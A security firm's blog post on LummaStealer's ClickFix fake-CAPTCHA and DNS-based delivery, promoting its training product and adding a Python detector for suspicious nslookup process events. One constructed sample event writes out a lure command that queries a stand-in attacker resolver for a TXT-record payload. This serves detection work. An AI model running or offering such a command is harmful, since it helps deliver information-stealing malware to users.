LummaStealer Is Back, and It's Using Fake CAPTCHAs

LummaStealer (not to be confused with our very own Lumara) is back.
The major information-stealing malware was disrupted by Microsoft and the US Department of Justice in mid-2025, but recent reporting shows it has resurfaced with a new delivery method called ClickFix.
ClickFix relies on fake CAPTCHA prompts to trick users into running malicious commands. In a ClickFix scenario, users complete the familiar "verify you are human" prompt. Instead of validating access, clicking triggers malicious commands that deploy LummaStealer, allowing the malware to harvest critical data, which could then be sold or passed to ransomware groups, including operators such as Octo Tempest.
A single fake CAPTCHA can open the door to full compromise. CAPTCHAs are designed as an additional layer of security, so most of us complete them without a second thought. This familiarity is what makes the attack effective.
The attack has continued to evolve beyond fake CAPTCHAs. Microsoft researchers recently documented a new variant where victims are instructed to run the nslookup command through the Windows Run dialog, querying an attacker-controlled DNS server. The malicious PowerShell payload is returned inside the DNS response itself, hidden inside normal-looking traffic. There is no suspicious file download to flag.
The method changes, but the entry point does not. In every variant, the attack succeeds because a user trusts a familiar process. User behaviour is the primary attack surface. When security measures we trust can be weaponised against us, ongoing education is critical.
Part of our Technology Extensions, Lumara Educate addresses this gap. With adaptive, AI-powered phishing simulations that are tailored to each user's skill level and adjusted based on their responses, it builds pattern recognition for the subtle tells that separate real verification from social engineering. Through repeated exposure to modern tactics, your team develops the instinct to pause and assess before that automatic click takes over.

ClickFix is just the latest example of how social engineering continues to adapt. Whether it's a fake CAPTCHA, a convincing phishing email, or a fraudulent request that seems to come from a trusted source, these attacks exploit the trust your team places in familiar processes. With Lumara Educate, your people are empowered to better understand the tactics behind modern threats, moving beyond simply following protocols to recognising and responding to evolving attacks with real insight. Your team becomes the frontline defence that recognises manipulation before damage occurs, closing the human behaviour gap and transforming your weakest link into your strongest defence.
Learn more about Lumara Extensions.
We're extending many of our existing customers' SecOps with Lumara Educate this year. If you'd like to level up, drop us a quick request via this form and we'll be in contact.
How We Are Responding
Secure ISS has deployed two new detections targeting a recently observed evolution of ClickFix attacks, where cybercriminals abuse the Windows DNS system to deliver malware to victim machines. Unlike traditional attacks that download malicious files from websites (which security tools commonly detect and block), this technique hides the attack inside normal-looking DNS traffic, allowing it to bypass many conventional security controls. These detections identify the specific command patterns associated with this behaviour, providing SOC analysts with the visibility needed to investigate and scope the compromise.
Scenario
A staff member at a client site searches Google for help with a printer driver issue. A convincing fake IT support page appears in the results, instructing them to run a "diagnostic command" by pressing Win+R and pasting a command from the page. They follow the instructions without suspicion.
Both detections fire and are raised with the client's SOC team. Analysts are able to identify the exact machine, user, and timestamp of the initial compromise, confirm the DNS server contacted, and scope whether the activity was isolated to a single endpoint or broader. Rather than discovering the breach weeks later through ransomware or a data loss notification, the SOC has a precise starting point for their incident response.
— Dustin Kearney, Security Operations Team Leader
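As an added illustration, not Secure ISS's own detection logic (the post does not publish its rule specifics), the Python below shows one way a SOC could score Windows process-creation events for the nslookup-based ClickFix variant described above: nslookup driven through a script interpreter, spawned from the Run dialog, and pointed at a resolver the organisation does not operate. The corporate resolver list, the interpreter list and the three sample events are constructed for the example.

```python
import re
# Constructed for this example: the organisation's own resolvers, and the interpreters a lure has the user type into Win+R.
CORPORATE_RESOLVERS = {"10.0.0.53", "10.0.1.53"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}

def nslookup_server(cmdline):
    """Explicit resolver passed to nslookup ([options] <name> [<server>]), else None."""
    m = re.search(r"nslookup(?:\.exe)?\s+(.*)", cmdline, re.IGNORECASE)
    if not m:
        return None
    positional = []
    for tok in m.group(1).split():
        tok = tok.strip("\"'")
        if tok in ("|", "&&", "&", ";"):  # stop at the next shell operator
            break
        if tok and not tok.startswith("-"):
            positional.append(tok)
    return positional[1] if len(positional) > 1 else None

def assess(event):
    """Score one process-creation event (Sysmon ID 1 / 4688 fields); returns (score, reasons)."""
    cmd = event["command_line"]
    if "nslookup" not in cmd.lower():
        return 0, []
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent_image"].lower().rsplit("\\", 1)[-1]
    reasons = []
    if image in INTERPRETERS:
        reasons.append("nslookup invoked through a script interpreter")
    if parent == "explorer.exe":
        reasons.append("spawned by explorer.exe, consistent with the Win+R Run dialog")
    server = nslookup_server(cmd)
    if server and server not in CORPORATE_RESOLVERS:
        reasons.append(f"explicit non-corporate resolver {server}")
    return len(reasons), reasons

def triage(events, threshold=2):
    """Events reaching the alert threshold, paired with the reasons an analyst sees."""
    return [(e, r) for e in events for s, r in [assess(e)] if s >= threshold]
# Constructed sample events: one Run-dialog lure, two routine lookups that must not alert.
SAMPLE_EVENTS = [
    {"user": "CORP\\jsmith", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": 'powershell -nop -c "nslookup -type=txt svc-update.example.invalid 203.0.113.5"'},
    {"user": "CORP\\admin", "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\nslookup.exe", "command_line": "nslookup mail.corp.example"},
    {"user": "CORP\\monitor", "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\nslookup.exe", "command_line": "nslookup -type=mx corp.example 10.0.0.53"},
]
```

Only the first event reaches the threshold; the two admin lookups score zero because they use the default or corporate resolver and are not launched through an interpreter from explorer.exe.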

